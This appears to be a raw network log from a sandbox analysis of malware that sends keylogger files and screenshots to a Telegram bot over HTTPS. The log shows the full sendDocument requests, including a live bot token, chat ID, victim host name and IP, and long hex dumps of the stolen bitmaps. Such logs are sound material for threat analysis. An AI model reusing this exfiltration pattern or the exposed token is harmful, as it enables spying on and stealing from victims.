2024-12-03 13:28:41 UTC	997	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 50 49 7a 6b 64 42 6c 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 32 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 32 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 32 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataPIzkdBls.txt"Content-Type: application/octet-stream[08:28:29]<<Program Manager>>[08:28:29]<<Program Manager>>[08:28:29]<<Program Mana
2024-12-03 13:28:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:41 GMT Content-Type: application/json Content-Length: 546 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:28:41 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3896,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232521,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49879	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:41 UTC	555	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 997 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:41 UTC	997	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 48 4d 45 63 73 6b 79 48 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 33 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 33 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 33 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataHMEcskyH.txt"Content-Type: application/octet-stream[08:28:30]<<Program Manager>>[08:28:30]<<Program Manager>>[08:28:30]<<Program Mana
2024-12-03 13:28:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:42 GMT Content-Type: application/json Content-Length: 546 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:28:42 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3897,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232522,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49884	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:45 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:45 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 57 66 68 4e 78 46 47 49 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotWfhNxFGI.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:28:45 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:45 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:45 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:45 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:45 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:45 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:45 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:45 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:45 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:49 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:49 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49889	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:46 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:46 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 53 42 72 51 6b 43 6e 74 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotSBrQkCnt.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:28:46 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:46 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:46 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 